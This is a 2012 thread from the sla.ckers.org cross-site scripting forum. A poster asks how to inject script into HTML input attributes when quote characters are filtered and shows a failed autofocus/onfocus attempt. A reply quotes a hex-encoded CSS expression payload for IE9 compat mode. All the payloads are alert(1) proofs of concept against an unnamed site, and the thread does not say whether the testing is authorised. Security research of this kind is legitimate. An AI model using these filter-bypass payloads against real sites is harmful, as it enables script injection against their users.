Close but no cigar, help for the final hurdle?

Cenzic 232 Patent

Paid Advertising

sla.ckers.org is
ha.ckers sla.cking

Q and A for any cross site scripting information. Feel free to ask away.

Go to Topic: Previous•Next

Go to: Forum List•Message List•New Topic•Search•Log In

Close but no cigar, help for the final hurdle?

Posted by: thegreatescape

Date: March 03, 2012 06:43PM

'"(){}/\<> - test chars

Results in source:

<input type="hidden" name="pageURL" value= (){}/\>

and bit further down:

<input type="text" name="link" id="link" style="width:400px" value=" (){}/\"/>

Can't think of any input type xss which doesn't use ' " ', can anyone help?

Closest I have got:

<input type="hidden" name="pageURL" value=/ AUTOFOCUS onfocus=alert(1) >
[but no alert]

[using Firefox, but any browser would be a help]

TheGreatEscape

Options: Reply•Quote

Re: Close but no cigar, help for the final hurdle?

Posted by: Albino

Date: March 04, 2012 05:27AM

I think this will work without quotes >>

Gareth Heyes Wrote:
-------------------------------------------------------
> Iframe the target site with the parent in compat
> mode then inject this:
> "style="xss:\65\78\70\72\65\73\73\69\6f\6e\28\61\6
> c\65\72\74\28\31\29\29"
>
> This will work on IE9 since the child inherits the
> parent compat mode

-------------------------------------------------------
Research blog

Options: Reply•Quote

Re: Close but no cigar, help for the final hurdle?

Posted by: thegreatescape

Date: March 04, 2012 02:12PM

That has quotation marks which are filtered, unless I misunderstand something.

Options: Reply•Quote

Go to: Forum List•Message List•Search•Log In

Sorry, only registered users may post in this forum.

Click here to login